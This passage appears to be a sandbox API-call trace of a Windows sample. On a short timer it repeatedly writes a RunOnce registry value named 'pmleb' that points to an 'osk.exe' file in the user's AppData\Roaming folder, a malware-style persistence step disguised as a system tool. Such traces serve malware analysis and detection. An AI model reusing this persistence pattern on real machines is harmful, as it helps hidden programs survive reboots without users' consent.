lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.126] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.126] RegCloseKey (hKey=0x280) returned 0x0 [0101.126] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.126] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.126] SetTimer (hWnd=0x20280, nIDEvent=0x2385, uElapse=0xa, lpTimerFunc=0x0) returned 0x2385 [0101.126] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.140] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.140] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.141] KillTimer (hWnd=0x20280, uIDEvent=0x2385) returned 1 [0101.141] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.141] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.141] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.141] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.142] RegCloseKey (hKey=0x280) returned 0x0 [0101.142] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.142] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.142] SetTimer (hWnd=0x20280, nIDEvent=0x2386, uElapse=0xa, lpTimerFunc=0x0) returned 0x2386 [0101.142] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.156] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.156] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.156] KillTimer (hWnd=0x20280, uIDEvent=0x2386) returned 1 [0101.156] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.157] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.157] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.157] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.157] RegCloseKey (hKey=0x280) returned 0x0 [0101.157] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.157] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.158] SetTimer (hWnd=0x20280, nIDEvent=0x2387, uElapse=0xa, lpTimerFunc=0x0) returned 0x2387 [0101.158] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.172] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.172] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.172] KillTimer (hWnd=0x20280, uIDEvent=0x2387) returned 1 [0101.172] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.172] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.173] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.173] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.173] RegCloseKey (hKey=0x280) returned 0x0 [0101.173] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.173] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.173] SetTimer (hWnd=0x20280, nIDEvent=0x2388, uElapse=0xa, lpTimerFunc=0x0) returned 0x2388 [0101.173] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.187] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.187] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.187] KillTimer (hWnd=0x20280, uIDEvent=0x2388) returned 1 [0101.188] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.188] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.188] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.188] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.188] RegCloseKey (hKey=0x280) returned 0x0 [0101.189] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.189] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.189] SetTimer (hWnd=0x20280, nIDEvent=0x2389, uElapse=0xa, lpTimerFunc=0x0) returned 0x2389 [0101.189] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.203] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.203] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.203] KillTimer (hWnd=0x20280, uIDEvent=0x2389) returned 1 [0101.203] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.203] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.204] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.204] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.204] RegCloseKey (hKey=0x280) returned 0x0 [0101.204] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.204] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.204] SetTimer (hWnd=0x20280, nIDEvent=0x238a, uElapse=0xa, lpTimerFunc=0x0) returned 0x238a [0101.204] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.219] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.219] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.219] KillTimer (hWnd=0x20280, uIDEvent=0x238a) returned 1 [0101.219] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.220] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.220] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.220] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.220] RegCloseKey (hKey=0x280) returned 0x0 [0101.220] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.220] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.220] SetTimer (hWnd=0x20280, nIDEvent=0x238b, uElapse=0xa, lpTimerFunc=0x0) returned 0x238b [0101.220] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.234] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.234] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.234] KillTimer (hWnd=0x20280, uIDEvent=0x238b) returned 1 [0101.234] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.235] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.235] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.235] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.235] RegCloseKey (hKey=0x280) returned 0x0 [0101.235] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.235] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.235] SetTimer (hWnd=0x20280, nIDEvent=0x238c, uElapse=0xa, lpTimerFunc=0x0) returned 0x238c [0101.236] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.300] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.300] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.300] KillTimer (hWnd=0x20280, uIDEvent=0x238c) returned 1 [0101.300] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.301] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.301] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.301] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.301] RegCloseKey (hKey=0x280) returned 0x0 [0101.302] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.302] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.302] SetTimer (hWnd=0x20280, nIDEvent=0x238d, uElapse=0xa, lpTimerFunc=0x0) returned 0x238d [0101.302] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.312] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.312] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.312] KillTimer (hWnd=0x20280, uIDEvent=0x238d) returned 1 [0101.313] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.313] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.313] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.313] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.314] RegCloseKey (hKey=0x280) returned 0x0 [0101.314] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.314] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.314] SetTimer (hWnd=0x20280, nIDEvent=0x238e, uElapse=0xa, lpTimerFunc=0x0) returned 0x238e [0101.314] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.328] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.328] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.328] KillTimer (hWnd=0x20280, uIDEvent=0x238e) returned 1 [0101.328] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.329] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.329] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.329] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.329] RegCloseKey (hKey=0x280) returned 0x0 [0101.329] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.329] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.330] SetTimer (hWnd=0x20280, nIDEvent=0x238f, uElapse=0xa, lpTimerFunc=0x0) returned 0x238f [0101.330] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.343] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.343] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.343] KillTimer (hWnd=0x20280, uIDEvent=0x238f) returned 1 [0101.344] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.344] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.344] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.344] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.344] RegCloseKey (hKey=0x280) returned 0x0 [0101.345] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.345] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.345] SetTimer (hWnd=0x20280, nIDEvent=0x2390, uElapse=0xa, lpTimerFunc=0x0) returned 0x2390 [0101.345] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.359] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.359] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.359] KillTimer (hWnd=0x20280, uIDEvent=0x2390) returned 1 [0101.359] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.360] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.360] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.360] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.360] RegCloseKey (hKey=0x280) returned 0x0 [0101.360] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.360] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.360] SetTimer (hWnd=0x20280, nIDEvent=0x2391, uElapse=0xa, lpTimerFunc=0x0) returned 0x2391 [0101.360] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.374] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.374] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.374] KillTimer (hWnd=0x20280, uIDEvent=0x2391) returned 1 [0101.375] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.375] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.375] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.375] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.376] RegCloseKey (hKey=0x280) returned 0x0 [0101.376] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.376] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.376] SetTimer (hWnd=0x20280, nIDEvent=0x2392, uElapse=0xa, lpTimerFunc=0x0) returned 0x2392 [0101.376] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.390] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.390] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.390] KillTimer (hWnd=0x20280, uIDEvent=0x2392) returned 1 [0101.390] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.391] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.391] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.391] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.391] RegCloseKey (hKey=0x280) returned 0x0 [0101.391] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.392] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.392] SetTimer (hWnd=0x20280, nIDEvent=0x2393, uElapse=0xa, lpTimerFunc=0x0) returned 0x2393 [0101.392] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.405] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.405] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.406] KillTimer (hWnd=0x20280, uIDEvent=0x2393) returned 1 [0101.406] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.406] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.406] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.407] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.407] RegCloseKey (hKey=0x280) returned 0x0 [0101.407] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.407] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.407] SetTimer (hWnd=0x20280, nIDEvent=0x2394, uElapse=0xa, lpTimerFunc=0x0) returned 0x2394 [0101.407] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.421] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.421] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.421] KillTimer (hWnd=0x20280, uIDEvent=0x2394) returned 1 [0101.422] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.422] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.422] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.422] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.422] RegCloseKey (hKey=0x280) returned 0x0 [0101.423] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.423] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.423] SetTimer (hWnd=0x20280, nIDEvent=0x2395, uElapse=0xa, lpTimerFunc=0x0) returned 0x2395 [0101.423] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.437] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.437] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.437] KillTimer (hWnd=0x20280, uIDEvent=0x2395) returned 1 [0101.438] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.438] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.438] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.438] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.439] RegCloseKey (hKey=0x280) returned 0x0 [0101.439] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.439] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.439] SetTimer (hWnd=0x20280, nIDEvent=0x2396, uElapse=0xa, lpTimerFunc=0x0) returned 0x2396 [0101.439] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.452] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.452] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.453] KillTimer (hWnd=0x20280, uIDEvent=0x2396) returned 1 [0101.453] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.453] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.453] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.453] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.454] RegCloseKey (hKey=0x280) returned 0x0 [0101.454] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.454] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.454] SetTimer (hWnd=0x20280, nIDEvent=0x2397, uElapse=0xa, lpTimerFunc=0x0) returned 0x2397 [0101.454] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, 